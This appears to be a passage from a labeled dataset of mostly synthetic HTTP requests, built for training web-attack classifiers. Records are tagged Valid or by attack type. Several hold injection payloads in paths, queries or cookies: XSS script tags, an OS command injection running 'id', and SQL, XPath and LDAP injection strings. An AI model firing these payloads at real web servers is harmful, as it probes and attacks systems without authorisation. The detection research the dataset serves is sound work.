If-Range: Fri, 10 Dec 04 15:29:35 GMT
Max-Forwards: 6079
MIME-Version: 2.5
Pragma: Msdt=NoJexl
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: NTLM ckRJdHR3ZThjQWlzYTNybmhleG5Bc3JzZXNhbnNJZWNp
Range: 286-378831
Referer: /Fgekwshd.ace
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 2.8; 8Z-ar; rv:4.4.1) Gecko/05599343
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6460x166
Via: HTTP/8.3 121.105.177.252
Transfer-Encoding: tlry; groe7nC=noutwdr
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 368281150283459
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45575
Start - Id: 32632
class: Valid
PUT /Np/0txme5s/Gj5AcmbwgetXhtaccesA/fotoRormef5dy/sl9Tu/v@390aJE/JdoB/eWk.gH@Vw2/fGbqADwggN3k.Om22j7.msf? HTTP/1.0
Content-Length: 240
Content-Language: uwttaht,tepeb6T,sxe
Content-Encoding: gzip
Content-Location: /inuerv.tiff
Content-MD5: N2FoZUN5aGxmb0Vkb2VzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Jan 05 10:06:36 CET
Last-Modified: Sun, 15 Jan 06 16:40:30 CET
Host: 3.185.139.199
Connection: 1mt1ehri
Accept: video/mpeg, text/*;q=0.9
Accept-Charset: x-mac-turkish, x-mac-greek;q=0.7, cp-932
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.7
Cache-Control: min-fresh=995
Client-ip: 83.101.124.16
Cookie: rlacropTns=e ne;AZotmp9isI6u=oIztl<ui |r%e(%te
Cookie2: $Version="043"
Date: Fri, 29 Feb 08 11:43:45 UTC
ETag: "mIeVAW7NphVBy_S"
Expect: 100-continue
From: thueneui@iqeto5ti.org
If-Modified-Since: Fri, 19 Nov 04 21:44:04 CET
If-Unmodified-Since: Sat, 27 Aug 05 15:57:04 CET
If-Match: *
If-None-Match: *
If-Range: "@ERZHDMoIFOlu0Z5.U"
Max-Forwards: 1
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=8Ce14fAB
Authorization: Basic Z25naGM6ZXcxZXR0Mg==
Range: -8365,-00217
Referer: /1ai9/eatade.pdf
TE: trailers,gzip;q=0.9,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (X11; U; Solaris 9.5; io-Oe; rv:3.3.6) Gecko/82147821
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 3.3 152.86.156.169, weoy/6.8 www.6eoa.js
Transfer-Encoding: gzip
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 659 180.178.216.93 "eswsYtuMme" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 4855309378866511170
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

alkri=srn3f6ueihle&NcmdaJ7=nr6l&dS4ern=9757&PU_U=o&pciqeen=71&Kureplacejdtg5sBc=60491998&Yh1O=48018&59IT=53&edsnsEg=a5metaruc4dEor<&jr.TGLTg=o\>|mi-bodyae2styleetcdropreplaceM&kesq=967015&0eirxRadywoihX=hmMr&catne=4741&tNeea=3785906

End - Id: 32632
Start - Id: 30056
class: Valid
GET /out/r7bSg6aQb2-itALzXe/Xu_xterm/8o9bFQDmran/oROh/Ta7eootfeElthadaeado/4u9gabs5odnyw/rbdPrGv@VD7DwyIwSd/1IwLz71c4DOEiGRLVUT/lbSe.G/ll1anzza.js?7uk50al=729386&Ssamgroup by.w=c%7Ese+e&ftpO42KRHMDElQ=27%40aVv&ZN5deleteolMkGBGr=gnomnl&sseeutuaknlm=35&ut=HsleNe&aNn2N=110260636&rss1o=wh&aet=+r6y%7Cw+n HTTP/1.0
Host: www.mada.org:4180
Connection: t2asoo
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-1;q=0.0, x-mac-icelandic;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: 3c-txei, ndye-yinthyc, tmwBrso-o;q=0.1
Cache-Control: min-fresh=77262
Client-ip: 21.39.235.102
Cookie: sae=yV5l14b;q.RLNNrurJD=iii8SmrG
Cookie2: $Version="16"
Date: Wed, 19 Sep 07 07:44:08 UTC
ETag: "X4X3wSkRbcqHJDFv7fQ"
Expect: 100-continue
From: aeeNsEvt@wbsohnw.st
If-Modified-Since: Thu, 01 May 08 10:36:02 GMT
If-Unmodified-Since: Fri, 20 Apr 07 10:09:39 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Nov 08 21:05:02 GMT
Max-Forwards: 8159
MIME-Version: 5.6
Pragma: thltee='khssC'
Proxy-Authorization: Digest nonce
Authorization: NTLM MWV0MGVhbmkzVHRyb21uM3I0aXIwcGJ1Q3lvbml1WXZ3bGUzcmFpZ2xkbg==
Range: 801-,-797
Referer: http://oiirm.st/Hlooiee/sleii9sc/mioczba/re1tih/s1jeeS5y.pl
TE: trailers,gzip
Trailer: Referer
User-Agent: thc4taLoejSdhbvBHat
UA-CPU: StrongARM
UA-Disp: 794,239,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8553x7465
Via: 0.1 www.5nmr.jpg, FTP/5.3 www.lEse.jpg, HTTP/4.9 8.59.146.114
Transfer-Encoding: deflate
Upgrade: redt/9.2, ueI/3.1, nydsiw/2.9, aIeel/6.3
Warning: 581 www.tnjva9ml.shtml:8444 "e1srtmxWdaoorc7sra" 
X-Forwarded-For: 255.243.109.163
X-Serial-Number: 243330147588053404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30056
Start - Id: 48385
class: XPathInjection
GET /vF/eo6vCbKyJdmZ58AkrBNc/re.asp?1looicm=726248381&QQCC=nlcahGaarin8yad&4eho5ihnhydiba=3777&tRopenC2CB1CrkA=lEtItu89etddirkst&Roa=esjstHEFeg3hrsb5st&nU@kDD=hoo&jtsNRnyeltoAs=wQ6p6XdDG1&rcctAtdr1r6q9s=88&ngfsssfnypc=zhHeAG&oPoti=jnq%28%29R%24wtdhidepimtf&rx7pnH=206750&scelbu=rYR HTTP/1.1
Host: 83.149.144.51
Connection: close
Accept: image/*, application/postscript;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 217.6.147.85
Cookie: nldEUo=e1taeOo>dawgeti>fbe0il>;le4Inhi=enr6mou'   or   xuh/5/child::node()[processing-instruction()=409]    or     'ru5'    =';uemrtkoedt=Fngtysltelnsiuguu
Cookie2: $Version="356"
Date: Fri, 18 Mar 05 13:57:38 UTC
ETag: "ihXg.rtvd__-N6YgAUA"
If-Modified-Since: Tue, 12 May 09 20:07:17 GMT
If-Unmodified-Since: Sat, 28 Aug 04 13:37:20 CET
If-Match: *
If-None-Match: "RQr.bMGRet.Tjukx"
If-Range: Tue, 12 May 09 08:16:20 UTC
Max-Forwards: 375
Pragma: ie1emn='tag'
Referer: /itmnot/npomh4ol/uwrIx/btnxsdh1.sh
TE: trailers,trailers,gzip
User-Agent: tAnp/8.3
UA-CPU: 68000
UA-Color: color8
UA-Pixels: 803x2412
Via: 4l5nc/5.6 www.kapa.png:42218
Transfer-Encoding: compress

null

End - Id: 48385
Start - Id: 46543
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.1
Host: 94.222.36.217
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: s-3the8id;q=0.9, 57fltmlu-e3Aeovyk, edrWhdsE-ojst;q=0.9
Cache-Control: mrimenu='re9'
Client-ip: 231.203.33.74
Cookie: srnblaIaksxt=1823
Cookie2: $Version="0"
Date: Mon, 10 Sep 07 24:32:19 CET
ETag: "2tchV3o_V1MPEQcePm"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 03:18:15 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: *
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 8
MIME-Version: 8.9
Pragma: ihi=rz4e
Proxy-Authorization: Basic OGVwZ29kdWU6c25lcw==
Authorization: NTLM YzBsNm9oaGloZldlSXRlbGluZm81Nm5zbml5ZnJ0Y09l
Range: 2794-2,-4107
Referer: http://www.ptlts.net/msht/oofnek/hsftax.pdf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.3 (Windows; U; Win98 9.8; dt-ia; rv:5.7.9) Gecko/72502025
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: el3e/9.3 www.apdoaE.js:684, 3.8 79.205.68.35
Transfer-Encoding: gzip
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46543
Start - Id: 42974
class: OsCommanding
GET /TGfbpdUasam5z/s4VWES/lMhLr4@JWMOz/V02EJlacLIafFw/tiin.gif? HTTP/1.1
Host: 40.169.24.120:80
Connection: ctno
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 208.193.210.121
Cookie: Uudt=04405;siast1nr=jBh;arifnqoiteqeoo=|  echo    "  Content-Type: text/html" ;    echo   ""     ;   id    \0
Cookie2: $Version="239"
Date: Sat, 30 Oct 04 18:52:35 CET
ETag: "meKd3jCIHLFMIt3Yay"
Expect: 100-continue
From: j1trn@ee7xn57ti.uk
If-Modified-Since: Tue, 13 Apr 04 12:35:32 UTC
If-Unmodified-Since: Mon, 22 Sep 08 20:37:05 GMT
If-Match: "UeZOfubh@R@FkNNXQUlg"
If-None-Match: "zWaURNmHVRjjfJ6cH3@"
If-Range: *
Max-Forwards: 285
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="KQttr"
Authorization: Basic RGV0OWFkOm9ucXRm
Range: 98862-034353
Referer: /epejlt6/9txta/yidih/iwalhbmw/thn3lhHh.tar
TE: trailers
User-Agent: rSIj5Xt3 http://www.tenbep7.org
UA-CPU: x86
UA-Disp: 404,617,8
Via: HTTP/4.6 109.92.80.8, FTP/8.4 www.elsaim6.gif
Transfer-Encoding: gzip
Upgrade: et3Ql/4.9, xei/0.8, vhoht/6.4, 4ore8/9.4
Warning: 141 www.iatasre.css "tmfhotN3eoi" "Tue, 13 Dec 05 15:00:41 CET"
X-Serial-Number: 15010428668018898380
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42974
Start - Id: 41701
class: SqlInjection
GET /wnIejresg/uOLzaw/logYT2idcK/dWi0bjO7MH7qpQ/7byRURjSthBpG8UWA/f17fZ3S@Y8ii3wI/t6ngDDFPFwOvml0o6_F/srst/bsyQwtAsrpmoq/UuUP/fareiM.php?rSp1nht0SNhlmE=OR+++++%27aoo%27++BETWEEN+++++%27R%27+AND++%27T%27&.YkYosFERDeD=dRtmpdo&wp-Bu2VyhttpsVidv=nrNl9ui&Eineufo=9281439&wd6trPifIue=nbyhu1&owhotdjoW2w=6net&rmsAeyf4sk=baU80d%400Z&cl6irZsWd5mb=hlMh07woZni5e5&ueolx=re0lbsojRx&2nnptearvshf=tot5zxVP HTTP/1.0
Host: www.etaedks.cz:7
Connection: 7X4wer
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress
Accept-Language: lqzhlkzi-idlhpa;q=0.9, ahyot9-hdn;q=0.0
Cache-Control: 98de=ayi
Client-ip: 51.187.24.113
Cookie: aihe3rreOeieT=088240
Cookie2: $Version="1"
Date: Thu, 15 Jan 09 02:15:12 GMT
ETag: "AG5CAg.oj.vm0Whv.Z2"
Expect: nllry
From: ube8gesO@rdptemmi.st
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Thu, 25 Sep 08 01:17:27 GMT
If-Match: "msN5PVFwMXvA_pA_3x"
If-None-Match: *
If-Range: "-KuWBsW5qsrNho.1"
Max-Forwards: 650
MIME-Version: 5.8
Pragma: naet=h
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bnBzMm90RTlhaTJ0dmhvaHJpZTE3OHJhaW5lbmVkYTBTYW90ZXdhbw==
Range: 864538-4,42725-309719
Referer: http://seIss.uk/9oewb/3ohaR8ae/uhnenee/vrta4/FailiY.php
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 5.0; 3s-tn; rv:6.2.9) Gecko/38463622
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: 4.7 www.ae1s.html:69328
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 763 5.20.25.117 "gmfte7ocbcLWwo" "Thu, 12 Jan 06 05:54:45 UTC"
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41701
Start - Id: 23838
class: Valid
GET /WYTcZ7Xuo@GbRY/5eJAmZI.gkN/aso0s/zT7VvK/nl.bin?rtijdsnk=939&8ij-tBEiVlN8=91307&fpdjdz2zoram=80478593&zv4orApOXformLb=975250057&noo5telsului=oSU5tRK&zt8T1hhGeheot=1&uk4daojE5oi=937856&et=122&wbiSr4ht=yefanx&tbsi3=ee%276mltnnr+stdina+ohm&Bwiha4edeia=21081&enabRvT0er=75154692&chhrnorati1gya=24 HTTP/1.0
Host: www.3baWea.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: euc-kr
Accept-Encoding: compress;q=0.3, gzip, compress
Accept-Language: aohecue-hjuydwt, a-ms, 4ey-ioPnEud;q=0.4, cn-aIdDx;q=0.4, d8-inn;q=0.7
Cache-Control: max-stale
Client-ip: 239.18.195.26
Cookie: geitOi=eYoestechild4e;dtfawhtrpMsa=mo1s2rxnTq8j>t0 ;epoy8tni2=rNnsI
Cookie2: $Version="65"
Date: Wed, 06 Sep 06 07:06:57 GMT
ETag: W/"L3jINxLdWgkcSg_n"
Expect: 100-continue
From: iaaodun@atohoee.uk
If-Modified-Since: Wed, 04 Feb 04 04:07:10 GMT
If-Unmodified-Since: Wed, 20 Sep 06 14:13:08 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Apr 05 20:30:09 UTC
Max-Forwards: 42
MIME-Version: 8.7
Pragma: m=n
Proxy-Authorization: NTLM aWF2NExDcml1YW9TaTRhcGV5RXBlYXNpdGR1ZWQyZGFhYWlpN29nVGlT
Authorization: Digest cnonce="w4n7b"
Range: -494,5-
Referer: http://kyboeUeI.uk/eoe0Oohe/d0st/amdkpmbb/tnah/eAuooiah.fgf
TE: chunked,trailers
Trailer: From
User-Agent: tdOev/7.9.1.4.9
UA-CPU: PowerPC
UA-Disp: 9572,573,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: 2.5 www.sOatu.html
Transfer-Encoding: compress
Upgrade: nay/4.9, hiEdJm/5.4
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 31488668121661585164
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23838
Start - Id: 28536
class: Valid
GET /oO_WyjCWt6zjIaxV/3iroSLmolaAe2bE.php4?e1laatcp=mt&jTlneesaranxE=19994623&Xusr@BstdinThKb=faat&ismOnszuei=eDmydcjjLME&aoanmhv=l%3BOswcf%7CeV&inputDtmp@zga=etBswKaz&erddni3tsa0uno=stelnetdAracopyo3ed HTTP/1.1
Host: www.tbemb.gov
Connection: keep-alive
Accept: application/*;q=0.2, video/quicktime
Accept-Charset: iso-8859-1;q=0.1, big5;q=0.7, iso-8859-2, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 8.219.184.213
Cookie: t6y=pq cds;5nn8unita5naw=adit
Cookie2: $Version="9"
Date: Sun, 14 Oct 07 06:54:55 UTC
ETag: "8DVUS.kNUOfqcr9H"
Expect: 100-continue
From: tuezrt@nexhlht5a.it
If-Modified-Since: Wed, 23 Jan 08 05:15:34 CET
If-Unmodified-Since: Fri, 06 Oct 06 10:40:48 GMT
If-Match: "mR8h8@0nytA5Zmrc5"
If-None-Match: "qEcRgPixmPjBd3aVS6c"
If-Range: *
Max-Forwards: 631
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: 1h6aL 2soNn=rl1nsusL
Authorization: usrfc5 s0lCaie=e9nig
Range: 6-267184,-1,5-7119
Referer: /ead38ce/lnoltfu.asp
TE: trailers,deflate
Trailer: Accept-Charset
User-Agent: ltrMrusairdews3ohoh7
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6545x8948
Via: 2.4 www.aRTte6.jpg, 8.6 236.139.238.69
Transfer-Encoding: gzip
Upgrade: 8omcl/7.6
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28536
Start - Id: 38426
class: LdapInjection
GET /lmsqawey7g6x1l/heeeetepojlvh4daw/aiWo2vHlu/eGk8E9rpF/rjeryuAoohunen0o.css?u2=wl%29%28+%7C+++%28tS%3D*%29&srtmaprtceUf=t%3Ejrl&qnwriAN=qihttpdsnpug HTTP/1.0
Host: www.rgttowtc.org
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: ueoaitH=uents
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Mon, 29 Mar 10 05:29:55 UTC
ETag: "caysJ7Ou24aNUTvQ"
Expect: 100-continue
From: rdilvt@ritcafh.net
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Tue, 28 Sep 04 24:07:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Oct 05 07:51:53 UTC
Max-Forwards: 63
MIME-Version: 2.2
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: y3eel 3rDd=dh62tdt
Range: -03,38-
Referer: http://www.Ctacds.it/Arvez.swf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 9.1; q2-kd; rv:4.7.3) Gecko/50131094
UA-CPU: x86
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: soon/5.4 64.89.237.87
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38426
Start - Id: 9157
class: Valid
GET /oYN.shtml?tah8t7yrntpder=Roemex9iwile0&a0dUmaW=zdcn&uktdml9s=4308787&8rh=iyiqStunion&gaaptnenTigaj=58&dfjomRuasc1ed=Hy0d%7Eqt+t%5Bmplmsemu&pOes=6809224&ndefbh=1829392&hoslge=lYD%40QriBnY4s&lMtlINmwspt=74200&nuth=000192&eAeibylr9=hnoznrqrr&taceiiIrsmEoiW=Etapzntmps HTTP/1.1
Host: www.d21snhs.org:8092
Connection: eeofrue7
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ee-ytbhL
Cache-Control: only-if-cached
Client-ip: 67.89.1.105
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="583"
Date: Wed, 28 Dec 05 03:46:48 CET
ETag: "jZ5op7eCvaTJUPG1EHJ"
Expect: Tialu
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Mon, 09 Nov 09 02:05:05 GMT
If-Unmodified-Since: Mon, 31 Jul 06 12:54:27 UTC
If-Match: "YHpGvS-v5pcVJNzX"
If-None-Match: *
If-Range: "ye3cNLKIiwnHHIsysh"
Max-Forwards: 9
MIME-Version: 9.1
Pragma: es='o7ei'
Proxy-Authorization: ktOzu w5Tane=sisl
Authorization: NTLM aHBydHRyZHVlZ2UybzdoZXVhb2FvYnY2c3EzZkdkYWJpeG9udnV1Z2lvOWVldWE=
Range: -7586
Referer: http://4ta8hp.ch/moihcdi/eoie/bS6c.sh
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.8 (compatible; MSIE 4.9; Linux i586; wcgcnepfa)
UA-CPU: MIPS
UA-Disp: 104,519,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0794x264
Via: 3.4 206.42.57.152:2, FTP/4.4 www.tvpti.gif
Transfer-Encoding: gzip
Upgrade: mapEt/8.1, RNae/5.1
Warning: 159 www.0AEorhcn.jpeg "6asniYhhhgonscr" "Sun, 16 Apr 06 01:50:22 CET"
X-Forwarded-For: 189.85.16.83
X-Serial-Number: 3795859892
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9157
Start - Id: 10324
class: Valid
GET /3SE4CUkformX7Pftpt/613HiHFMCL/hEdinnhobencw0dnfgor/enbAoiS9fonvom/fq5ujxBe5TI/ThT6TeZiframecApositionVDS/ew.html? HTTP/1.0
Host: www.aealR.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4;q=0.7, windows-1251;q=0.4, iso-8859-15;q=0.3
Accept-Encoding: 
Accept-Language: Ct-p2hXclg, e6-35mntsC;q=0.6, pmiEaelS-aiat;q=0.5, otd-w9hIniOh;q=0.3
Cache-Control: no-store
Client-ip: 225.199.96.45
Cookie: 1xtaf=tRN1QSX0vS5r;ess1omeif=ncrhohLjZ;hXdDO=9504992;yaeresilhxn=rNvFxrjs;igo=0;Asd41LWbinR=;like:O
Cookie2: $Version="56"
Date: Sun, 30 Nov 08 09:02:05 UTC
ETag: W/"EYezGROZhzumkOacy"
Expect: teax
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Thu, 23 Mar 06 14:05:15 CET
If-Unmodified-Since: Sun, 27 Feb 05 24:15:23 UTC
If-Match: "_BK-rcMwi22BTxR@"
If-None-Match: "cZ2R6Ju4NvQNf@K@W"
If-Range: Mon, 29 Dec 08 12:06:17 CET
Max-Forwards: 9
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rfff
Authorization: NTLM ZGlkb1N0aGVEb2ZhZWRyZWVuc3hlTmU5ZmloaXdhYWNoaDJ1dGlC
Range: -708348,-278258
Referer: http://www.jbIelq.biz/auof0o.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.8 (X11; U; Linux i386 9.3; ty-eo; rv:1.3.0) Gecko/13285970
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: HTTP/7.2 www.uCeilc.gif
Transfer-Encoding: compress
Upgrade: pnge/0.2
Warning: 464 www.t6l1.jpeg "rueaeivla7hs" 
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10324
Start - Id: 2792
class: Valid
GET /b47zSb.Pjstyle9/ht6yzeto4udtnbiH9C/rlrmt/ftgdbsboNeaene7oeks/alikeCoFq5Q_Vz.html?1i3@=fq&cYsock_stream80KBws=dtts%28from&nsmnhv=hQHpMScS8&s1oefefaco9=5707214&zeumejy=wb&hs=723&6hoeSp9ttuoeorf=045&hO2=591671&u0oh=aBb%3D%2FeE88i%27&atfquoba=%3DArvarta HTTP/1.1
Host: www.hssmi.uk
Connection: close
Accept: video/*, text/xml;q=0.3, video/*
Accept-Charset: x-mac-chinesesimp, windows-1250;q=0.2, x-mac-korean;q=0.4
Accept-Encoding: deflate;q=0.5, identity, compress, identity;q=0.1, deflate
Accept-Language: Gba-le
Cache-Control: no-store
Client-ip: 196.47.7.205
Cookie: 9ae=t8;6tmpQPgq=t;s924=rna7$eycqi5betweenor;oynsta8aarr=635080;easpcVPl=52;0Zoptphpcxp_5l=y1wdu1atec
Cookie2: $Version="49"
Date: Mon, 30 Mar 09 09:56:55 UTC
ETag: "Ddx8ftvn5TLLcJFhel"
Expect: tdtn
From: Tlot@oesrsd.uk
If-Modified-Since: Tue, 25 Oct 05 08:27:40 CET
If-Unmodified-Since: Fri, 13 Jan 06 07:48:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: leAtd gaxt=n4pbnae
Range: 653260-,8-79,061108-10
Referer: /jesegcn/ndhfxn/dOeasot/t8eafd.asmx
TE: trailers,deflate;q=0.5,gzip;q=0.9
Trailer: If-Range
User-Agent: Mozilla/0.5 (Windows; U; Windows NT 0.7; t0-HT; rv:3.1.7) Gecko/62427177
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 944x3965
Via: FTP/6.1 15.125.165.17, 7.1 www.yst6.html
Transfer-Encoding: deflate
Upgrade: Sbhjos/1.1
Warning: 646 www.AeDo.jpeg "ecttnoa" "Fri, 13 Jun 08 18:30:30 GMT"
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2792
Start - Id: 8501
class: Valid
GET /Tek.png?rmxocetdt7ti=47&afBn=sZJqMQbHGq&meaRFkfaoudecet=5455&Mttaf=a&EeAroraNy=84&aAdeK81=eD%27&axjtrynmrnt2=teltoe&haKlesohwdoEezr=input%3F&ptAtlexJphsnxsr=rFfe HTTP/1.1
Host: 45.22.70.251
Connection: dha9
Accept: video/quicktime;q=0.6, image/*, video/mpeg
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 218.28.79.254
Cookie: tk84ostq=donti;EoTahtat=n11
Cookie2: $Version="14"
Date: Sun, 12 Aug 07 09:33:43 UTC
ETag: "esd8WWa1FkwyXiAsu"
Expect: 100-continue
From: 0fdrhls@qeltd9e6.uk
If-Modified-Since: Sun, 11 Jun 06 04:23:20 UTC
If-Unmodified-Since: Wed, 23 May 07 14:44:11 UTC
If-Match: "zTyGZc4nvpeMFHM"
If-None-Match: "ZqbvXRCxEFlrj-Jt8"
If-Range: *
Max-Forwards: 7824
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest username="acgtn"
Authorization: Digest cnonce="eehiq"
Range: -665,319484-,9-
Referer: http://Lmywes41.gov/nani.ace
TE: trailers,chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/3.5 (compatible; ya2qels; Mac OS X; yieef; hee0hed31; qa2fns)
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6704x1260
Via: FTP/2.4 28.203.62.132, FTP/7.6 208.106.179.156, 0.4 27.247.161.131
Transfer-Encoding: deflate
Upgrade: ant/1.7
Warning: 054 220.48.171.98 "iEbptnlss" "Sun, 08 Mar 09 01:03:10 CET"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8501
Start - Id: 32012
class: Valid
GET /vtwOhgtA-NVK/ped/lE0WTfcrm8e4bVE/ykGreplacet/hYGDKc.jsp?miu=odowkWIjN&antt1Ht5=89&LqT5vD=671&evztklcB=wzU3&77RbmailHocdocumentn5-=eds8oothehyea1&eztEOwmenIfEe=xc%25au&yhreA2erert=5787540799&bnllltqs=jSu6EK&iEiyehaioko7av=jUCIagO-eo_l&seeani8leoihle=iyu HTTP/1.0
Host: www.dis8.de:2
Connection: voo8i7i
Accept: */*
Accept-Charset: iso-8859-3
Accept-Encoding: gzip;q=0.1, deflate, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 204.40.173.64
Cookie: sa6e=rana;8wfondhSY=199923;ayrsnrew=oKaDb;nstlooimtIn5f=98619369
Cookie2: $Version="84"
Date: Tue, 19 Jun 07 02:31:57 CET
